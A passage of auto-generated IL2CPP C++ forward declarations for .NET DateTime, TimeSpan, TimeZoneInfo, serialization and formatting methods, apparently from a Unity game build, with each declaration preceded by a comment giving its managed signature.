System.DateTime::.ctor(System.Int64,System.DateTimeKind,System.Boolean) extern "C" IL2CPP_METHOD_ATTR void DateTime__ctor_m8946C6F0EFB7933840C449A2C859B08101393A84 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, int64_t ___ticks0, int32_t ___kind1, bool ___isAmbiguousDst2, const RuntimeMethod* method); // System.Int64 System.DateTime::DateToTicks(System.Int32,System.Int32,System.Int32) extern "C" IL2CPP_METHOD_ATTR int64_t DateTime_DateToTicks_m8315FA4947393A7ABDB9A9905EE6B0F11ECC6A64 (int32_t ___year0, int32_t ___month1, int32_t ___day2, const RuntimeMethod* method); // System.Void System.DateTime::.ctor(System.Int32,System.Int32,System.Int32) extern "C" IL2CPP_METHOD_ATTR void DateTime__ctor_mF4506D7FF3B64F7EC739A36667DC8BC089A6539A (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, int32_t ___year0, int32_t ___month1, int32_t ___day2, const RuntimeMethod* method); // System.Int64 System.DateTime::TimeToTicks(System.Int32,System.Int32,System.Int32) extern "C" IL2CPP_METHOD_ATTR int64_t DateTime_TimeToTicks_m38671AD5E9A1A1DE63AF5BAC980B0A0E8E67A5DB (int32_t ___hour0, int32_t ___minute1, int32_t ___second2, const RuntimeMethod* method); // System.Void System.DateTime::.ctor(System.Int32,System.Int32,System.Int32,System.Int32,System.Int32,System.Int32,System.Int32) extern "C" IL2CPP_METHOD_ATTR void DateTime__ctor_m6567CDEB97E6541CE4AF8ADDC617CFF419D5A58E (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, int32_t ___year0, int32_t ___month1, int32_t ___day2, int32_t ___hour3, int32_t ___minute4, int32_t ___second5, int32_t ___millisecond6, const RuntimeMethod* method); // System.Runtime.Serialization.SerializationInfoEnumerator System.Runtime.Serialization.SerializationInfo::GetEnumerator() extern "C" IL2CPP_METHOD_ATTR SerializationInfoEnumerator_tB72162C419D705A40F34DDFEB18E6ACA347C54E5 * SerializationInfo_GetEnumerator_m9796C5CB43B69B5236D530A547A4FC24ABB0B575 (SerializationInfo_t1BB80E9C9DEA52DBF464487234B045E2930ADA26 * __this, const RuntimeMethod* method); // System.String System.Runtime.Serialization.SerializationInfoEnumerator::get_Name() extern "C" IL2CPP_METHOD_ATTR String_t* SerializationInfoEnumerator_get_Name_m925E3C668A70982F88C8EBEEB86BA0D45B71857E (SerializationInfoEnumerator_tB72162C419D705A40F34DDFEB18E6ACA347C54E5 * __this, const RuntimeMethod* method); // System.Object System.Runtime.Serialization.SerializationInfoEnumerator::get_Value() extern "C" IL2CPP_METHOD_ATTR RuntimeObject * SerializationInfoEnumerator_get_Value_m90F91B3AFD43BA00E4A69FC0954761CFD9C55AE1 (SerializationInfoEnumerator_tB72162C419D705A40F34DDFEB18E6ACA347C54E5 * __this, const RuntimeMethod* method); // System.Globalization.CultureInfo System.Globalization.CultureInfo::get_InvariantCulture() extern "C" IL2CPP_METHOD_ATTR CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F * CultureInfo_get_InvariantCulture_mF13B47F8A763CE6A9C8A8BB2EED33FF8F7A63A72 (const RuntimeMethod* method); // System.Int64 System.Convert::ToInt64(System.Object,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR int64_t Convert_ToInt64_m8964FDE5D82FEC54106DBF35E1F67D70F6E73E29 (RuntimeObject * ___value0, RuntimeObject* ___provider1, const RuntimeMethod* method); // System.UInt64 System.Convert::ToUInt64(System.Object,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR uint64_t Convert_ToUInt64_mA8C3C5498FC28CBA0EB0C37409EB9E04CCF6B8D2 (RuntimeObject * ___value0, RuntimeObject* ___provider1, const RuntimeMethod* method); // System.Boolean System.Runtime.Serialization.SerializationInfoEnumerator::MoveNext() extern "C" IL2CPP_METHOD_ATTR bool SerializationInfoEnumerator_MoveNext_m74D8DE9528E7DDD141DD45ABF4B54F832DE35701 (SerializationInfoEnumerator_tB72162C419D705A40F34DDFEB18E6ACA347C54E5 * __this, const RuntimeMethod* method); // System.Void System.Runtime.Serialization.SerializationException::.ctor(System.String) extern "C" IL2CPP_METHOD_ATTR void SerializationException__ctor_m88AAD9671030A8A96AA87CB95701938FBD8F16E1 (SerializationException_tA1FDFF6779406E688C2192E71C38DBFD7A4A2210 * __this, String_t* ___message0, const RuntimeMethod* method); // System.Int64 System.DateTime::get_InternalTicks() extern "C" IL2CPP_METHOD_ATTR int64_t DateTime_get_InternalTicks_mB15814A4A13CB1562769F6EEA1547D5DE6DB0469 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method); // System.Void System.DateTime::.ctor(System.Runtime.Serialization.SerializationInfo,System.Runtime.Serialization.StreamingContext) extern "C" IL2CPP_METHOD_ATTR void DateTime__ctor_m399F434D85D918405F74C5B04BCBD8C1B410F10E (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, SerializationInfo_t1BB80E9C9DEA52DBF464487234B045E2930ADA26 * ___info0, StreamingContext_t2CCDC54E0E8D078AF4A50E3A8B921B828A900034 ___context1, const RuntimeMethod* method); // System.UInt64 System.DateTime::get_InternalKind() extern "C" IL2CPP_METHOD_ATTR uint64_t DateTime_get_InternalKind_mBEFC1CE38FE8832B8BDF7784C3ACB4BDF25D4E42 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method); // System.DateTime System.DateTime::AddTicks(System.Int64) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_AddTicks_m0FAD7AE5AEAF9DB974BBA46C0749163DD9DD0AA5 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, int64_t ___value0, const RuntimeMethod* method); // System.DateTime System.DateTime::Add(System.TimeSpan) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_Add_mA4F1A47C77858AC06AF07CCE9BDFF32F442B27DB (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 ___value0, const RuntimeMethod* method); // System.DateTime System.DateTime::Add(System.Double,System.Int32) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_Add_mC05E213CD5FC31C6AA98BB0B741EF319A0142524 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, double ___value0, int32_t ___scale1, const RuntimeMethod* method); // System.DateTime System.DateTime::AddDays(System.Double) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_AddDays_mB11D2BB2D7DD6944D1071809574A951258F94D8E (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, double ___value0, const RuntimeMethod* method); // System.DateTime System.DateTime::AddMilliseconds(System.Double) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_AddMilliseconds_mD93AB4338708397D6030FF082EBB3FC8C3E195F2 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, double ___value0, const RuntimeMethod* method); // System.Int32 System.DateTime::GetDatePart(System.Int32) extern "C" IL2CPP_METHOD_ATTR int32_t DateTime_GetDatePart_m228B8E3A744BBCF0A8BB5F8FA470532FF09CCC41 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, int32_t ___part0, const RuntimeMethod* method); // System.Int32 System.DateTime::DaysInMonth(System.Int32,System.Int32) extern "C" IL2CPP_METHOD_ATTR int32_t DateTime_DaysInMonth_mE979D12858E0D6CC14576D283B5AB66AA53B9F90 (int32_t ___year0, int32_t ___month1, const RuntimeMethod* method); // System.DateTime System.DateTime::AddMonths(System.Int32) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_AddMonths_mFACFF352D9DFA0D4B3AC47BFFEA0564F163D7AEC (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, int32_t ___months0, const RuntimeMethod* method); // System.DateTime System.DateTime::AddSeconds(System.Double) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_AddSeconds_m36DC8835432569A70AC5120359527350DD65D6B2 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, double ___value0, const RuntimeMethod* method); // System.DateTime System.DateTime::AddYears(System.Int32) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_AddYears_m4D66AFB61758D852CEEFE29D103C88106C6847A2 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, int32_t ___value0, const RuntimeMethod* method); // System.Int32 System.DateTime::CompareTo(System.Object) extern "C" IL2CPP_METHOD_ATTR int32_t DateTime_CompareTo_mC233DDAE807A48EE6895CC09CE22E111E506D08C (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, RuntimeObject * ___value0, const RuntimeMethod* method); // System.Int32 System.DateTime::CompareTo(System.DateTime) extern "C" IL2CPP_METHOD_ATTR int32_t DateTime_CompareTo_mB538B6524ED249F1A5ED43E00D61F7D9EB3DAD6E (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___value0, const RuntimeMethod* method); // System.Boolean System.DateTime::IsLeapYear(System.Int32) extern "C" IL2CPP_METHOD_ATTR bool DateTime_IsLeapYear_m973908BB0519EEB99F34E6FCE5774ABF72E8ACF7 (int32_t ___year0, const RuntimeMethod* method); // System.Int64 System.TimeSpan::TimeToTicks(System.Int32,System.Int32,System.Int32) extern "C" IL2CPP_METHOD_ATTR int64_t TimeSpan_TimeToTicks_m30D961C24084E95EA9FE0565B87FCFFE24DD3632 (int32_t ___hour0, int32_t ___minute1, int32_t ___second2, const RuntimeMethod* method); // System.Boolean System.DateTime::Equals(System.Object) extern "C" IL2CPP_METHOD_ATTR bool DateTime_Equals_m85006DF1EA5B2B7EAB4BEFA643B5683B0BDBE4AB (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, RuntimeObject * ___value0, const RuntimeMethod* method); // System.Boolean System.DateTime::Equals(System.DateTime) extern "C" IL2CPP_METHOD_ATTR bool DateTime_Equals_m5D0978D469FA7B13308608D7DA97E1AF6265AD42 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___value0, const RuntimeMethod* method); // System.TimeSpan System.TimeZoneInfo::GetLocalUtcOffset(System.DateTime,System.TimeZoneInfoOptions) extern "C" IL2CPP_METHOD_ATTR TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 TimeZoneInfo_GetLocalUtcOffset_m1C5E0CC7CA725508F5180BDBF2D03C3E8DF0FBFC (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___dateTime0, int32_t ___flags1, const RuntimeMethod* method); // System.Int64 System.TimeSpan::get_Ticks() extern "C" IL2CPP_METHOD_ATTR int64_t TimeSpan_get_Ticks_m829C28C42028CDBFC9E338962DC7B6B10C8FFBE7 (TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * __this, const RuntimeMethod* method); // System.TimeSpan System.TimeZoneInfo::GetUtcOffsetFromUtc(System.DateTime,System.TimeZoneInfo,System.Boolean&,System.Boolean&) extern "C" IL2CPP_METHOD_ATTR TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 TimeZoneInfo_GetUtcOffsetFromUtc_mAA79026F581A893DD65B95D5660E146520B471FA (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___time0, TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777 * ___zone1, bool* ___isDaylightSavings2, bool* ___isAmbiguousLocalDst3, const RuntimeMethod* method); // System.DateTime System.DateTime::FromBinaryRaw(System.Int64) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_FromBinaryRaw_m62E01B6FBD437260699D149A18C00CA49B793A5F (int64_t ___dateData0, const RuntimeMethod* method); // System.Void System.Runtime.Serialization.SerializationInfo::AddValue(System.String,System.Int64) extern "C" IL2CPP_METHOD_ATTR void SerializationInfo_AddValue_mCCC2918D05840247B2A72A834940BD36AD7F5DE4 (SerializationInfo_t1BB80E9C9DEA52DBF464487234B045E2930ADA26 * __this, String_t* ___name0, int64_t ___value1, const RuntimeMethod* method); // System.Void System.Runtime.Serialization.SerializationInfo::AddValue(System.String,System.UInt64) extern "C" IL2CPP_METHOD_ATTR void SerializationInfo_AddValue_m9861690C28AB414534D1A7F599E050DBA7A99303 (SerializationInfo_t1BB80E9C9DEA52DBF464487234B045E2930ADA26 * __this, String_t* ___name0, uint64_t ___value1, const RuntimeMethod* method); // System.Void System.DateTime::System.Runtime.Serialization.ISerializable.GetObjectData(System.Runtime.Serialization.SerializationInfo,System.Runtime.Serialization.StreamingContext) extern "C" IL2CPP_METHOD_ATTR void DateTime_System_Runtime_Serialization_ISerializable_GetObjectData_m6DDB58B228D00F832D1670A52C6217973595CFA6 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, SerializationInfo_t1BB80E9C9DEA52DBF464487234B045E2930ADA26 * ___info0, StreamingContext_t2CCDC54E0E8D078AF4A50E3A8B921B828A900034 ___context1, const RuntimeMethod* method); // System.Int64 System.DateTime::ToBinaryRaw() extern "C" IL2CPP_METHOD_ATTR int64_t DateTime_ToBinaryRaw_m337980211329E7231056A835F8EB1179A55E927E (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method); // System.DateTime System.DateTime::get_Date() extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_get_Date_m9466964BC55564ED7EEC022AB9E50D875707B774 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method); // System.Int32 System.DateTime::get_Day() extern "C" IL2CPP_METHOD_ATTR int32_t DateTime_get_Day_m3C888FF1DA5019583A4326FAB232F81D32B1478D (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method); // System.DayOfWeek System.DateTime::get_DayOfWeek() extern "C" IL2CPP_METHOD_ATTR int32_t DateTime_get_DayOfWeek_m556E45050ECDB336B3559BC395081B0C5CBE4891 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method); // System.Int32 System.DateTime::GetHashCode() extern "C" IL2CPP_METHOD_ATTR int32_t DateTime_GetHashCode_mCA2FDAC81B0779FA2E478E6C6D92D019CD4B50C0 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method); // System.Int32 System.DateTime::get_Hour() extern "C" IL2CPP_METHOD_ATTR int32_t DateTime_get_Hour_mAE590743ACB6951BD0C4521634B698AE34EC08B3 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method); // System.DateTimeKind System.DateTime::get_Kind() extern "C" IL2CPP_METHOD_ATTR int32_t DateTime_get_Kind_m44C21F0AB366194E0233E48B77B15EBB418892BE (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method); // System.Int32 System.DateTime::get_Minute() extern "C" IL2CPP_METHOD_ATTR int32_t DateTime_get_Minute_m688A6B7CF6D23E040CBCA15C8CFFBE5EE5C62A77 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method); // System.Int32 System.DateTime::get_Month() extern "C" IL2CPP_METHOD_ATTR int32_t DateTime_get_Month_m9E31D84567E6D221F0E686EC6894A7AD07A5E43C (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method); // System.DateTime System.DateTime::get_UtcNow() extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_get_UtcNow_m171F52F4B3A213E4BAD7B78DC8E794A269DE38A1 (const RuntimeMethod* method); // System.TimeSpan System.TimeZoneInfo::GetDateTimeNowUtcOffsetFromUtc(System.DateTime,System.Boolean&) extern "C" IL2CPP_METHOD_ATTR TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 TimeZoneInfo_GetDateTimeNowUtcOffsetFromUtc_m57199B9E169E531B6653648D8520F42F4DC70B7A (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___time0, bool* ___isAmbiguousLocalDst1, const RuntimeMethod* method); // System.Int64 System.DateTime::get_Ticks() extern "C" IL2CPP_METHOD_ATTR int64_t DateTime_get_Ticks_mBCB529E43D065E498EAF08971D2EB49D5CB59D60 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method); // System.Int64 System.DateTime::GetSystemTimeAsFileTime() extern "C" IL2CPP_METHOD_ATTR int64_t DateTime_GetSystemTimeAsFileTime_mE9A326A4F6301E7E932903FC5DA4D1A31060D2C7 (const RuntimeMethod* method); // System.Int32 System.DateTime::get_Second() extern "C" IL2CPP_METHOD_ATTR int32_t DateTime_get_Second_m0EC5A6215E5FF43D49702279430EAD1B66302951 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method); // System.Void System.TimeSpan::.ctor(System.Int64) extern "C" IL2CPP_METHOD_ATTR void TimeSpan__ctor_mEB013EB288370617E8D465D75BE383C4058DB5A5 (TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * __this, int64_t ___ticks0, const RuntimeMethod* method); // System.TimeSpan System.DateTime::get_TimeOfDay() extern "C" IL2CPP_METHOD_ATTR TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 DateTime_get_TimeOfDay_mAC191C0FF7DF8D1370DFFC1C47DE8DC5FA048543 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method); // System.Int32 System.DateTime::get_Year() extern "C" IL2CPP_METHOD_ATTR int32_t DateTime_get_Year_m019BED6042282D03E51CE82F590D2A9FE5EA859E (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method); // System.Globalization.DateTimeFormatInfo System.Globalization.DateTimeFormatInfo::GetInstance(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * DateTimeFormatInfo_GetInstance_m83D1F4FFA0E6FD7F223040DAE0EAD02993FBE2DD (RuntimeObject* ___provider0, const RuntimeMethod* method); // System.DateTime System.DateTimeParse::Parse(System.String,System.Globalization.DateTimeFormatInfo,System.Globalization.DateTimeStyles) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTimeParse_Parse_m452E56D26BB4E9A3450434A55F0C7046124BC62A (String_t* ___s0, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi1, int32_t ___styles2, const RuntimeMethod* method); // System.Void System.Globalization.DateTimeFormatInfo::ValidateStyles(System.Globalization.DateTimeStyles,System.String) extern "C" IL2CPP_METHOD_ATTR void DateTimeFormatInfo_ValidateStyles_m681E339557B4727B92138AAEC70ACC69FF31CA17 (int32_t ___style0, String_t* ___parameterName1, const RuntimeMethod* method); // System.DateTime System.DateTimeParse::ParseExact(System.String,System.String,System.Globalization.DateTimeFormatInfo,System.Globalization.DateTimeStyles) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTimeParse_ParseExact_m53595CD96FF504A940A435D43F084A8BE08CBDCD (String_t* ___s0, String_t* ___format1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi2, int32_t ___style3, const RuntimeMethod* method); // System.Globalization.DateTimeFormatInfo System.Globalization.DateTimeFormatInfo::get_CurrentInfo() extern "C" IL2CPP_METHOD_ATTR DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * DateTimeFormatInfo_get_CurrentInfo_m74E97DE51E5F8F803557FCDF11F041F200AB9C3F (const RuntimeMethod* method); // System.String System.DateTimeFormat::Format(System.DateTime,System.String,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormat_Format_m3324809CE00998580E953F539E93153ADBB8447A (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___dateTime0, String_t* ___format1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi2, const RuntimeMethod* method); // System.String System.DateTime::ToString() extern "C" IL2CPP_METHOD_ATTR String_t* DateTime_ToString_mBB245CB189C10659D35E8E273FB03E34EA1A7122 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method); // System.String System.DateTime::ToString(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR String_t* DateTime_ToString_m30D2730D4AB64F21D73E2037237150FC5B00F0C8 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method); // System.String System.DateTime::ToString(System.String,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR String_t* DateTime_ToString_m9943D2AB36F33BA0A4CF44DAE32D5944E2561B1C (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, String_t* ___format0, RuntimeObject* ___provider1, const RuntimeMethod* method); // System.DateTime System.TimeZoneInfo::ConvertTimeToUtc(System.DateTime,System.TimeZoneInfoOptions) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 TimeZoneInfo_ConvertTimeToUtc_m296EB8284D179E8F42849A9F02306B55CA009952 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___dateTime0, int32_t ___flags1, const RuntimeMethod* method); // System.DateTime System.DateTime::ToUniversalTime() extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_ToUniversalTime_mA8B74D947E186568C55D9C6F56D59F9A3C7775B1 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method); // System.TypeCode System.DateTime::GetTypeCode() extern "C" IL2CPP_METHOD_ATTR int32_t DateTime_GetTypeCode_m81C81123AC262794A28C3AA7F717D84A620290DB (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, const RuntimeMethod* method); // System.Boolean System.DateTime::System.IConvertible.ToBoolean(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR bool DateTime_System_IConvertible_ToBoolean_mF3E8C8165EF5EFB4FAC81A5FC42C6D43CBBE4A43 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method); // System.Char System.DateTime::System.IConvertible.ToChar(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR Il2CppChar DateTime_System_IConvertible_ToChar_mB13617F47244C7D6244E2C2428446C400212F859 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method); // System.SByte System.DateTime::System.IConvertible.ToSByte(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR int8_t DateTime_System_IConvertible_ToSByte_m0577A0A1C226A26F0C92B65A7A3642E58C718078 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method); // System.Byte System.DateTime::System.IConvertible.ToByte(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR uint8_t DateTime_System_IConvertible_ToByte_m5E09EBD1927AD26BC9589F68260366A3B926D01F (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method); // System.Int16 System.DateTime::System.IConvertible.ToInt16(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR int16_t DateTime_System_IConvertible_ToInt16_m93FA9B75E4EEAD2756A271E0E3C6FB041A98C75E (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method); // System.UInt16 System.DateTime::System.IConvertible.ToUInt16(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR uint16_t DateTime_System_IConvertible_ToUInt16_m86FFF72766A8C70F9099DEE61111D3E0B9FC618D (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method); // System.Int32 System.DateTime::System.IConvertible.ToInt32(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR int32_t DateTime_System_IConvertible_ToInt32_m494AB8F54DE9983726AD984DAB9AC41F9BE3EDDF (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method); // System.UInt32 System.DateTime::System.IConvertible.ToUInt32(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR uint32_t DateTime_System_IConvertible_ToUInt32_mBC2307EA9BC8BDD1CA4D83FF93036F6361D3390B (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method); // System.Int64 System.DateTime::System.IConvertible.ToInt64(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR int64_t DateTime_System_IConvertible_ToInt64_m37AB85D1F73721D2C30274B8008564637435E03B (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method); // System.UInt64 System.DateTime::System.IConvertible.ToUInt64(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR uint64_t DateTime_System_IConvertible_ToUInt64_mD79A0DAD19E8DA50E102E48A793FD0BA9F0DC34E (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method); // System.Single System.DateTime::System.IConvertible.ToSingle(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR float DateTime_System_IConvertible_ToSingle_m5AA2E27FE6580FA36530B9475A80DF43BFEF8B90 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method); // System.Double System.DateTime::System.IConvertible.ToDouble(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR double DateTime_System_IConvertible_ToDouble_m4E342FDC428CF2B3F3E634A2C583DE8350BC7075 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method); // System.Decimal System.DateTime::System.IConvertible.ToDecimal(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 DateTime_System_IConvertible_ToDecimal_mB7DCD14BFB253B7CD70733AA9E58FA2824D508F3 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method); // System.DateTime System.DateTime::System.IConvertible.ToDateTime(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTime_System_IConvertible_ToDateTime_m2E02F7ED2921DB5A3D7AC8381A6B496F9EC0C7A3 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method); // System.Object System.DateTime::System.IConvertible.ToType(System.Type,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR RuntimeObject * DateTime_System_IConvertible_ToType_m1CB32A2D30BF107AC583ABF3E4FA778A7955DAE5 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, Type_t * ___type0, RuntimeObject* ___provider1, const RuntimeMethod* method); // System.Void System.DateTimeFormat::FormatDigits(System.Text.StringBuilder,System.Int32,System.Int32,System.Boolean) extern "C" IL2CPP_METHOD_ATTR void DateTimeFormat_FormatDigits_m42EA03EA97A7BF81D98A8DA1DC2449DF7A74F05A (StringBuilder_t * ___outputBuffer0, int32_t ___value1, int32_t ___len2, bool ___overrideLengthLimit3, const RuntimeMethod* method); // System.Text.StringBuilder System.Text.StringBuilder::Append(System.Char*,System.Int32) extern "C" IL2CPP_METHOD_ATTR StringBuilder_t * StringBuilder_Append_m353B571BF530B0BD74B61E499EAF6536F1B93E84 (StringBuilder_t * __this, Il2CppChar* ___value0, int32_t ___valueCount1, const RuntimeMethod* method); // System.String System.Globalization.HebrewNumber::ToString(System.Int32) extern "C" IL2CPP_METHOD_ATTR String_t* HebrewNumber_ToString_mCFDFB829050DAA0081F94AE7BA9176124852557F (int32_t ___Number0, const RuntimeMethod* method); // System.Text.StringBuilder System.Text.StringBuilder::Append(System.String) extern "C" IL2CPP_METHOD_ATTR StringBuilder_t * StringBuilder_Append_mDBB8CCBB7750C67BE2F2D92F47E6C0FA42793260 (StringBuilder_t * __this, String_t* ___value0, const RuntimeMethod* method); // System.String System.Globalization.DateTimeFormatInfo::GetAbbreviatedDayName(System.DayOfWeek) extern "C" IL2CPP_METHOD_ATTR String_t* DateTimeFormatInfo_GetAbbreviatedDayName_m31D50EB7EF2ED3E7F0F72C14498427D8E7799D43 